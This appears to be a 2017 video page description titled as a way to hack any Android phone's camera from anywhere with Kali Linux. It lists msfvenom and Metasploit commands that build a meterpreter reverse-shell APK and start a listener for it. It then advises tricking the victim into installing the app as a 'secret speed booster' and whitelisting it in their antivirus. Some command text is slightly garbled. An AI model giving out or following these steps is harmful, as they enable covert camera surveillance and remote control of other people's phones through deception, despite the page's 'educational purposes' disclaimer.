Hack any Android phones camera (front & back) wirelessly from anywhere using Kali Linux (metasploit

Zidudat 2017-09-23

Views 6

THIS VIDEO IS INTENDED STRICTLY FOR EDUCATIONAL PURPOSES. WE | DECK HACKS TEAM | ARE NOT RESPONSIBLE FOR ANY OF THE WRONG USE OF THIS METHOD. THIS VIDEO IS JUST MADE TO TEACH ABOUT ONE BASIC ELEMENT OF KALI LINUX METASPLOIT. NOT RESPONSIBLE FOR ANY KIND OF HARM TO PHONE OR PC\r
\r
Thanks for watching guys.\r
check out our fb page :: \r
\r
This was a how-to video in which we taught you how to hack any Android phones camera front or back sitting anywhere in the world.\r
\r
Commands to be executed in Kali Linux:::\r
1. ifconfig | to obtain your IP address|\r
2. msfvenom-p android/meterpreter/reverse_tcp LHOST=|your IP address| add LORT=4444 R > |anyname|.apk |to make apk file|\r
3. msfconsole | to start METASPLOIT FRAMEWORK|\r
4. use exploit/multi/handler |to invoke exploit handler|\r
5. set payload android/meterpreter/reverse_tcp |to set payload value|\r
6. set lhost | your IP address| |to set local host|\r
7. set lport 4444 | to set port |\r
8. |after installing apk file on Android phone| exploit\r
\r
Precautions::\r
If the victim uses VPN you cannot hack his phone\r
The app must be opened after running the exploit command in Kali Linux \r
Keep the app in the whitelist of any antivirus in victim phone | It is not at all a virus but due to use of metasploit framework the antivirus detects it as a malware but it is not at all harmful|\r
\r
Suggestions::\r
Tell the victim that the app you are installing is of some use such as it is a secret speed booster it never but optimised speed

Share This Video


Download

  
Report form